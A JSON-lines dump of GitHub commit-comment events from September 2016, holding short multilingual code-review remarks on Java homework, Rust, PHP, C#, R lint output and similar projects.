{"id":"4519765357","type":"CommitCommentEvent","actor":{"login":"SYPlanP"},"repo":{"name":"SYPlanP/Grov"},"payload":{"comment":{"id":18906950,"position":null,"line":null,"path":null,"commit_id":"381b12a4dcf2111b37a92e44f688fc4dd1410da9","created_at":"2016-09-06T07:54:04Z","updated_at":"2016-09-06T07:54:04Z","body":"OOB -> OBB\nmistake"}},"created_at":"2016-09-06T07:54:04Z"}
{"id":"4519767383","type":"CommitCommentEvent","actor":{"login":"jsteemann"},"repo":{"name":"arangodb/arangodb-php"},"payload":{"comment":{"id":18906955,"position":47,"line":47,"path":"CHANGELOG","commit_id":"8aca9a25e1b676f64f7790a16650f88b22c2ab50","created_at":"2016-09-06T07:54:32Z","updated_at":"2016-09-06T07:54:32Z","body":"just re-added batch functionality for the 3.0 version of the driver."}},"created_at":"2016-09-06T07:54:32Z"}
{"id":"4519772168","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906964,"position":10,"line":10,"path":"src/Module3/Homework/Task3/CollegeStudent.java","commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T07:55:44Z","updated_at":"2016-09-06T07:55:44Z","body":"Почему в этом классе столько межстрочных пробелов?"}},"created_at":"2016-09-06T07:55:44Z"}
{"id":"4519774509","type":"CommitCommentEvent","actor":{"login":"GitHubchen123"},"repo":{"name":"GitHubchen123/web1"},"payload":{"comment":{"id":18906968,"position":null,"line":null,"path":null,"commit_id":"b305f1984ee2309593add96cb5a0b00de0a8c328","created_at":"2016-09-06T07:56:17Z","updated_at":"2016-09-06T07:56:17Z","body":"hello world good man"}},"created_at":"2016-09-06T07:56:17Z"}
{"id":"4519774634","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18906969,"position":34,"line":20,"path":"resources/views/include/projects.blade.php","commit_id":"b9897cb771608db29934519da7a72c30d8809a46","created_at":"2016-09-06T07:56:18Z","updated_at":"2016-09-06T07:56:18Z","body":"перенос имеет смысл делать когда строка большая или содержит например большое кол-во аттрибутов, в примере с лого это избыточно"}},"created_at":"2016-09-06T07:56:18Z"}
{"id":"4519775152","type":"CommitCommentEvent","actor":{"login":"Kaien0"},"repo":{"name":"Kaien0/SIAP"},"payload":{"comment":{"id":18906973,"position":null,"line":null,"path":null,"commit_id":"fbc7a982d770e51e2053c0103e468908f55ab42b","created_at":"2016-09-06T07:56:26Z","updated_at":"2016-09-06T07:56:26Z","body":"Retour en arrière"}},"created_at":"2016-09-06T07:56:26Z"}
{"id":"4519778322","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906982,"position":14,"line":14,"path":"src/Module3/Homework/Task3/Course.java","commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T07:57:12Z","updated_at":"2016-09-06T07:57:12Z","body":"опять куча межстрочных"}},"created_at":"2016-09-06T07:57:12Z"}
{"id":"4519780300","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906986,"position":107,"line":107,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T07:57:39Z","updated_at":"2016-09-06T07:57:39Z","body":"var url = action === \"new\" ? \"/inhouse/stocktaking/create\" :  \"/inhouse/stocktaking/update\";\r\n$$http(url, postSource).then(...);\r\n之前的代码中没有简化"}},"created_at":"2016-09-06T07:57:39Z"}
{"id":"4519784084","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906995,"position":10,"line":10,"path":"src/Module3/Homework/Task3/SpecialStudent.java","commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T07:58:32Z","updated_at":"2016-09-06T07:58:32Z","body":"межстрочные"}},"created_at":"2016-09-06T07:58:32Z"}
{"id":"4519784826","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18906999,"position":17,"line":17,"path":"src/Module3/Homework/Task3/SpecialStudent.java","commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T07:58:42Z","updated_at":"2016-09-06T07:58:42Z","body":"межстрочные"}},"created_at":"2016-09-06T07:58:42Z"}
{"id":"4519785110","type":"CommitCommentEvent","actor":{"login":"hycugb"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18907001,"position":147,"line":147,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T07:58:47Z","updated_at":"2016-09-06T07:58:47Z","body":"是应该统一定义一个全局变量ulrs去管理页面用到的所有url"}},"created_at":"2016-09-06T07:58:47Z"}
{"id":"4519786024","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907004,"position":22,"line":22,"path":"src/Module3/Homework/Task3/SpecialStudent.java","commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T07:59:00Z","updated_at":"2016-09-06T07:59:00Z","body":"межстрочные"}},"created_at":"2016-09-06T07:59:00Z"}
{"id":"4519787372","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18907006,"position":16,"line":31,"path":"resources/views/project/edit.blade.php","commit_id":"b9897cb771608db29934519da7a72c30d8809a46","created_at":"2016-09-06T07:59:19Z","updated_at":"2016-09-06T07:59:19Z","body":"тут у меня есть сомнения, если $project->year будет пустой, мы получим какой то не очевидный год, хорошо бы сделать явное условие, и если значение не установлено, устанавливать например текущий год"}},"created_at":"2016-09-06T07:59:19Z"}
{"id":"4519790672","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18907010,"position":null,"line":null,"path":null,"commit_id":"b9897cb771608db29934519da7a72c30d8809a46","created_at":"2016-09-06T08:00:05Z","updated_at":"2016-09-06T08:00:05Z","body":"ревью кода выполнено "}},"created_at":"2016-09-06T08:00:05Z"}
{"id":"4519793357","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907015,"position":null,"line":null,"path":null,"commit_id":"4908fb420c377884f1632e084b818c752ffbab36","created_at":"2016-09-06T08:00:39Z","updated_at":"2016-09-06T08:00:39Z","body":"Куча межстрочных пробелов."}},"created_at":"2016-09-06T08:00:39Z"}
{"id":"4519793991","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18907016,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-06T08:00:47Z","updated_at":"2016-09-06T08:00:47Z","body":"any more details about the exact error you see?"}},"created_at":"2016-09-06T08:00:47Z"}
{"id":"4519794760","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":18907019,"position":19,"line":19,"path":"createMasksForFilteringData.py","commit_id":"61b85f1b114579c5fda1c85e84ad9de18dbc13ba","created_at":"2016-09-06T08:00:58Z","updated_at":"2016-09-06T08:00:58Z","body":"I think that data.shape is pretty readable (easier to understand in the code), although twice as long as myDim.  "}},"created_at":"2016-09-06T08:00:58Z"}
{"id":"4519796816","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18907021,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-06T08:01:26Z","updated_at":"2016-09-06T08:01:26Z","body":"hiermit wird bei der clients Anzeige in den Internals einen Zeilenumbruch zugefügt"}},"created_at":"2016-09-06T08:01:26Z"}
{"id":"4519797521","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18907022,"position":null,"line":null,"path":null,"commit_id":"b5690b78d30521fa5fdf2fecaf05ad137cec0e5d","created_at":"2016-09-06T08:01:36Z","updated_at":"2016-09-06T08:01:36Z","body":"[R/read_collected_parameters.R:16:27:](https://github.com/richelbilderbeek/Cer2016/blob/b5690b78d30521fa5fdf2fecaf05ad137cec0e5d/R/read_collected_parameters.R#L16) *style:* **Commas should always have a space after.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                          ^\n```\n[R/read_collected_parameters.R:16:29:](https://github.com/richelbilderbeek/Cer2016/blob/b5690b78d30521fa5fdf2fecaf05ad137cec0e5d/R/read_collected_parameters.R#L16) *style:* **Only use double-quotes.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                            ^~~~~~~~~~~~~~~~~~\n```\n[R/read_collected_parameters.R:16:47:](https://github.com/richelbilderbeek/Cer2016/blob/b5690b78d30521fa5fdf2fecaf05ad137cec0e5d/R/read_collected_parameters.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                                             ~^~\n```\n[R/read_collected_parameters.R:16:48:](https://github.com/richelbilderbeek/Cer2016/blob/b5690b78d30521fa5fdf2fecaf05ad137cec0e5d/R/read_collected_parameters.R#L16) *style:* **Only use double-quotes.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                                               ^~~~~~\n```"}},"created_at":"2016-09-06T08:01:36Z"}
{"id":"4519806188","type":"CommitCommentEvent","actor":{"login":"krazedkrish"},"repo":{"name":"rhoit/my-config"},"payload":{"comment":{"id":18907039,"position":null,"line":null,"path":null,"commit_id":"23c7945763e730d246894cbd7fa4ddf4682ce8b4","created_at":"2016-09-06T08:03:48Z","updated_at":"2016-09-06T08:03:48Z","body":"try \r\n    aoe) wine ~/.wine/drive_c/games/aoe2/age2_x1/ age2_x1.exe -- -Nostartup';;\r\ninstead of \r\n    aoe) exec xterm -e /bin/bash -c 'cd ~/.wine/drive_c/games/aoe2/age2_x1/ && wine age2_x1.exe -- -Nostartup';;\r\n\r\nit should work."}},"created_at":"2016-09-06T08:03:48Z"}
{"id":"4519807566","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18907043,"position":15,"line":17,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"6d42e5ee1bf7e9550fb8018647c13a66055782f4","created_at":"2016-09-06T08:04:11Z","updated_at":"2016-09-06T08:04:11Z","body":":+1: Ceci est plus proche de code C#.\r\n\r\nMais on voit que `get` et `set` ne font rien. On peut donc simplifier encore un peu.\r\n\r\n```csharp\r\npublic int Dmg { get, set };\r\n// ou carrément\r\npublic int Dmg;\r\n```\r\n\r\nL'avantage de ce type de code est qu'on peut construire notre objet ainsi. Un code qui gagne en lisibilité sur les constructeurs habituels.\r\n\r\n```csharp\r\nnew Arme { Dmg = 10 };\r\n```"}},"created_at":"2016-09-06T08:04:11Z"}
{"id":"4519808027","type":"CommitCommentEvent","actor":{"login":"alehinsasha"},"repo":{"name":"AleksandrAkhunov/work4"},"payload":{"comment":{"id":18907045,"position":5,"line":57,"path":"features/ОприходованиеТоваров.feature","commit_id":"437ea77cc01f25908fb1fe759373059bdc4c60d6","created_at":"2016-09-06T08:04:18Z","updated_at":"2016-09-06T08:04:18Z","body":"1 фича проверяет 1 функциональность. Т.е. сценарий проверки реализации нужно перенести в соответствующую фичу, а чтобы она работала, нужно загружать из xml поступление, т.е. сценарий должен подготовить для себя инфобазу. Когда потребуется чтобы проведения поступления как-то особенно при каких-то условия проводилось - добавите сценарий в эту фичу.\r\n\r\nТак же функциональность, например: подбор товаров в табличную часть - эту другая функциональность, следовательно - фича."}},"created_at":"2016-09-06T08:04:18Z"}
{"id":"4519809185","type":"CommitCommentEvent","actor":{"login":"SGolenzovskiy"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18907048,"position":34,"line":20,"path":"resources/views/include/projects.blade.php","commit_id":"b9897cb771608db29934519da7a72c30d8809a46","created_at":"2016-09-06T08:04:35Z","updated_at":"2016-09-06T08:04:35Z","body":"@sintsov Так переносит IDE при автоформатировании. Учту на будущее."}},"created_at":"2016-09-06T08:04:35Z"}
{"id":"4519811048","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907051,"position":8,"line":8,"path":"src/Module3/Homework/Task2/Adder.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:05:02Z","updated_at":"2016-09-06T08:05:02Z","body":"Этот метод всегда возвращает true, почему внутри условий не возврат результата, а вывод в консоль?"}},"created_at":"2016-09-06T08:05:02Z"}
{"id":"4519812722","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907056,"position":21,"line":777,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:05:26Z","updated_at":"2016-09-06T08:05:26Z","body":"applied a put "}},"created_at":"2016-09-06T08:05:26Z"}
{"id":"4519813313","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907058,"position":22,"line":778,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:05:35Z","updated_at":"2016-09-06T08:05:35Z","body":"client raises "}},"created_at":"2016-09-06T08:05:35Z"}
{"id":"4519813372","type":"CommitCommentEvent","actor":{"login":"syamaraj"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":18907059,"position":null,"line":null,"path":null,"commit_id":"343ebfaa150840ab2da875b9effe512d6440ebc5","created_at":"2016-09-06T08:05:35Z","updated_at":"2016-09-06T08:05:35Z","body":"comment\n\nOn Tue, Sep 6, 2016 at 11:12 AM, outconn2 <notifications@github.com> wrote:\n\n> comment 22\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nammafunteam/nammarepository/commit/343ebfaa150840ab2da875b9effe512d6440ebc5#commitcomment-18905819>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANln9wafeWQwHh27SSnrDGsq7Yaqe0U0ks5qnP1jgaJpZM4J1cVU>\n> .\n>\n\n\n\n-- \nSyama R\n"}},"created_at":"2016-09-06T08:05:35Z"}
{"id":"4519814601","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907064,"position":10,"line":10,"path":"src/Module3/Homework/Task2/Arithmetic.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:05:53Z","updated_at":"2016-09-06T08:05:53Z","body":"зачем оборачивать тут в круглые скобки?"}},"created_at":"2016-09-06T08:05:53Z"}
{"id":"4519815360","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18907069,"position":32,"line":3420,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-06T08:06:05Z","updated_at":"2016-09-06T08:06:05Z","body":"bei der 98_Dooya.pm kann ich den Fehler nicht finden\r\n```\r\nperl ./contrib/commandref_join.pl\r\n*** EN FHEM/98_Dooya.pm: Unbalanced li (-1, last line ok: 1225)\r\n```"}},"created_at":"2016-09-06T08:06:05Z"}
{"id":"4519815960","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907072,"position":12,"line":12,"path":"src/Module3/Homework/Task2/Arithmetic.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:06:15Z","updated_at":"2016-09-06T08:06:15Z","body":"зачем тут sout?"}},"created_at":"2016-09-06T08:06:15Z"}
{"id":"4519816535","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907075,"position":23,"line":779,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:06:22Z","updated_at":"2016-09-06T08:06:22Z","body":"/putted/put/"}},"created_at":"2016-09-06T08:06:22Z"}
{"id":"4519818547","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907082,"position":14,"line":14,"path":"src/Module3/Homework/Task2/Arithmetic.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:06:52Z","updated_at":"2016-09-06T08:06:52Z","body":"почему не сразу return a + b; ?"}},"created_at":"2016-09-06T08:06:52Z"}
{"id":"4519820325","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18907090,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T08:07:19Z","updated_at":"2016-09-06T08:07:19Z","body":"Yep, very good change. "}},"created_at":"2016-09-06T08:07:19Z"}
{"id":"4519821218","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907094,"position":18,"line":18,"path":"src/Module3/Homework/Task2/Adder.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:07:33Z","updated_at":"2016-09-06T08:07:33Z","body":"почему не сразу return a >= b; ?"}},"created_at":"2016-09-06T08:07:33Z"}
{"id":"4519821873","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907095,"position":28,"line":784,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:07:42Z","updated_at":"2016-09-06T08:07:42Z","body":"equal to the "}},"created_at":"2016-09-06T08:07:42Z"}
{"id":"4519822864","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18907099,"position":15,"line":17,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"6d42e5ee1bf7e9550fb8018647c13a66055782f4","created_at":"2016-09-06T08:07:56Z","updated_at":"2016-09-06T08:07:56Z","body":"Si vous avez des restes du cours Python, c'est la même chose que `@property`, mais en moins verbeux (vive C#).\r\n\r\n```python\r\nclass Arme:\r\n    @property\r\n    def dommage(self):\r\n        \"\"\"Dommage infligé par l'arme.\"\"\"\r\n        return self._dommage\r\n    @dommage.set\r\n    def _(self, value):\r\n        self._dommage = value\r\n    @dommage.del\r\n    def _(self):\r\n        self._dommage = None\r\n```"}},"created_at":"2016-09-06T08:07:56Z"}
{"id":"4519823941","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/test-repo"},"payload":{"comment":{"id":18907102,"position":23,"line":23,"path":"MOHA_TaskExecutor.java","commit_id":"800a429e591a556a17d31d4687090d1a28b683b5","created_at":"2016-09-06T08:08:13Z","updated_at":"2016-09-06T08:08:13Z","body":"Comments explaining the following function is needed"}},"created_at":"2016-09-06T08:08:13Z"}
{"id":"4519824024","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18907105,"position":null,"line":null,"path":null,"commit_id":"a62aee441fabfda28d581cee45d8ad0e6e812342","created_at":"2016-09-06T08:08:14Z","updated_at":"2016-09-06T08:08:14Z","body":"Also see [Issue 255: OS X 10.5 and Missing symbols for FixedKeyLength<params>::KEYLENGTH](http://github.com/weidai11/cryptopp/issues/255)."}},"created_at":"2016-09-06T08:08:14Z"}
{"id":"4519826190","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907106,"position":30,"line":786,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:08:44Z","updated_at":"2016-09-06T08:08:44Z","body":"/cause/because/"}},"created_at":"2016-09-06T08:08:44Z"}
{"id":"4519826795","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/test-repo"},"payload":{"comment":{"id":18907108,"position":63,"line":63,"path":"MOHA_TaskExecutor.java","commit_id":"800a429e591a556a17d31d4687090d1a28b683b5","created_at":"2016-09-06T08:08:52Z","updated_at":"2016-09-06T08:08:52Z","body":"Where is the ActiveMQ_Manager class? We may need some comments that can explain about this."}},"created_at":"2016-09-06T08:08:52Z"}
{"id":"4519826959","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907111,"position":30,"line":786,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:08:55Z","updated_at":"2016-09-06T08:08:55Z","body":"/write/written/"}},"created_at":"2016-09-06T08:08:55Z"}
{"id":"4519828685","type":"CommitCommentEvent","actor":{"login":"ram-argus"},"repo":{"name":"crewjam/etcd-aws"},"payload":{"comment":{"id":18907117,"position":47,"line":44,"path":"README.md","commit_id":"9efc23ebfa750eb7e816de06a0a5a9aba43dced2","created_at":"2016-09-06T08:09:20Z","updated_at":"2016-09-06T08:09:20Z","body":"are you using this cluster with kubernetes?\r\nI cannot get the LB setup to work properly with kubernetes, I was trying to use etcd2 proxy mode that points to the LB, point all clients to LB, there seem to be some issues with each approach.\r\n\r\nThanks"}},"created_at":"2016-09-06T08:09:20Z"}
{"id":"4519829266","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907118,"position":29,"line":785,"path":"src/raftstore/store/peer.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:09:26Z","updated_at":"2016-09-06T08:09:26Z","body":"/apply/be applied/ "}},"created_at":"2016-09-06T08:09:26Z"}
{"id":"4519830570","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18907119,"position":null,"line":null,"path":null,"commit_id":"45323bddd83982a183714d91167194f73bab1440","created_at":"2016-09-06T08:09:44Z","updated_at":"2016-09-06T08:09:44Z","body":"This commit was backed out in favor of declaring the constants as `enums`. Also see [Commit a62aee441fabfda2](http://github.com/weidai11/cryptopp/commit/a62aee441fabfda28d581cee45d8ad0e6e812342).\r\n\r\nAlso see [Issue 255: OS X 10.5 and Missing symbols for FixedKeyLength<params>::KEYLENGTH](http://github.com/weidai11/cryptopp/issues/255)."}},"created_at":"2016-09-06T08:09:44Z"}
{"id":"4519831038","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18907120,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T08:09:50Z","updated_at":"2016-09-06T08:09:50Z","body":"Yes, but the update is : \r\n- move noscript from core to template. I'm not sure it's the best solution : i think the noscriopt tag must be in core, and not in template. :unsure:"}},"created_at":"2016-09-06T08:09:50Z"}
{"id":"4519833140","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907124,"position":15,"line":15,"path":"src/Module3/Homework/Task2/Main.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:10:21Z","updated_at":"2016-09-06T08:10:21Z","body":"Зачем ты читаешь с консоли, не проще как все заранее указать все что нужно и сколько нужно? Это гипотетический вопрос, если тебе так удобней, не вопрос."}},"created_at":"2016-09-06T08:10:21Z"}
{"id":"4519833310","type":"CommitCommentEvent","actor":{"login":"dooglus"},"repo":{"name":"OutCast3k/coinbin"},"payload":{"comment":{"id":18907126,"position":null,"line":null,"path":null,"commit_id":"3c1e957519ce05aded7050b31035079a0ad31601","created_at":"2016-09-06T08:10:23Z","updated_at":"2016-09-06T08:10:23Z","body":"Fixes #60."}},"created_at":"2016-09-06T08:10:23Z"}
{"id":"4519836934","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18907133,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T08:11:13Z","updated_at":"2016-09-06T08:11:13Z","body":"well, maybe one day we'll make a template working without js ;-)"}},"created_at":"2016-09-06T08:11:13Z"}
{"id":"4519839933","type":"CommitCommentEvent","actor":{"login":"jiksoo75"},"repo":{"name":"jiksoo75/test-repo"},"payload":{"comment":{"id":18907136,"position":null,"line":null,"path":null,"commit_id":"800a429e591a556a17d31d4687090d1a28b683b5","created_at":"2016-09-06T08:11:55Z","updated_at":"2016-09-06T08:11:55Z","body":"Initial comments on the source codes."}},"created_at":"2016-09-06T08:11:55Z"}
{"id":"4519840648","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":18907138,"position":5,"line":566,"path":"src/raftstore/store/store.rs","commit_id":"8456bce22e6277a30d064f687a0b6f548a7eea5d","created_at":"2016-09-06T08:12:05Z","updated_at":"2016-09-06T08:12:05Z","body":"Making vector with capacity of ids. "}},"created_at":"2016-09-06T08:12:05Z"}
{"id":"4519842543","type":"CommitCommentEvent","actor":{"login":"blinoff82"},"repo":{"name":"nickdoherty81/android_manifest"},"payload":{"comment":{"id":18907142,"position":66,"line":493,"path":"default.xml","commit_id":"3e716e720f0aa161bf629f27defae0460db59ea2","created_at":"2016-09-06T08:12:32Z","updated_at":"2016-09-06T08:12:32Z","body":"Are you sure in \"m-caf\" revision? Now we use ril ver. 10. CM changed to ver. 11 for nougat. idk maybe unknown baseband appears due to this commit. Just info..."}},"created_at":"2016-09-06T08:12:32Z"}
{"id":"4519845553","type":"CommitCommentEvent","actor":{"login":"bimalkjha"},"repo":{"name":"ibmdb/node-ibm_db"},"payload":{"comment":{"id":18907146,"position":null,"line":null,"path":null,"commit_id":"d5fc49a15b6864b8b454fa7720294a93b8e0b924","created_at":"2016-09-06T08:13:14Z","updated_at":"2016-09-06T08:13:14Z","body":"@pswamikr Following way of passing parameters for stored procedure is not correct:\r\nparams.push(0);\r\nparams.push('');\r\nparams.push('');\r\nparams.push(0);\r\n\r\nFirst you should know the datatype of output parameters and pass that value in params. When OUTPUT parameters will get binded with correct types, then you'll get the result.\r\n\r\nIt should be like below:\r\n\r\nparams.push({ParamType:\"OUTPUT\", DataType:1, Data:0});\r\nparams.push({ParamType:\"OUTPUT\", DataType:1, Data:'out'});\r\nparams.push({ParamType:\"OUTPUT\", DataType:1, Data:'out'});\r\nparams.push({ParamType:\"OUTPUT\", DataType:1, Data:0});\r\n\r\nIf we don't pass ParamType as OUTPUT or INOUT, ibm_db will assume its paramtype as INPUT which is the default type. Also, if you know the correct SQLType of your output parameters, please try them. If not working, share the SQLTypes of these output parameters here. Please check this documentation for more info: https://github.com/ibmdb/node-ibm_db#bindingparameters\r\n\r\nThanks.\r\n"}},"created_at":"2016-09-06T08:13:14Z"}
{"id":"4519845634","type":"CommitCommentEvent","actor":{"login":"h2rSys"},"repo":{"name":"h2rSys/libredte-sowerphp"},"payload":{"comment":{"id":18907147,"position":null,"line":null,"path":null,"commit_id":"a21d4e56dcb75e9dc95007d3903634ca5917f89a","created_at":"2016-09-06T08:13:15Z","updated_at":"2016-09-06T08:13:15Z","body":"Define URL y Hash usuario autorizado empresas y agrega envío automático de correo antes de  revisión Estado -11"}},"created_at":"2016-09-06T08:13:15Z"}
{"id":"4519848997","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"serg-fam/GoJavaOnline4"},"payload":{"comment":{"id":18907164,"position":1,"line":6,"path":"src/Module3/Homework/Task1/Solution.java","commit_id":"4cdb504e065ef69a127ca99744abce239c31a5c0","created_at":"2016-09-06T08:14:02Z","updated_at":"2016-09-06T08:14:02Z","body":"Этот таск вообще никуда не годный в условии есть птица и животное, у животного есть  метод ходить, а птица наследует все повадки животного (т.е. ходит), и дальше наша птичка может петь, представляться и т.д.\r\n\r\nпосмотри внимательно условие задачи"}},"created_at":"2016-09-06T08:14:02Z"}
{"id":"4519849801","type":"CommitCommentEvent","actor":{"login":"1vanK"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18907168,"position":null,"line":null,"path":null,"commit_id":"48f779e234b4cf6f2429e1456935412731950ef8","created_at":"2016-09-06T08:14:14Z","updated_at":"2016-09-06T08:14:14Z","body":"alphamask=\"true\" still exists in some CoreData\\Techniques\\*.xml files"}},"created_at":"2016-09-06T08:14:14Z"}
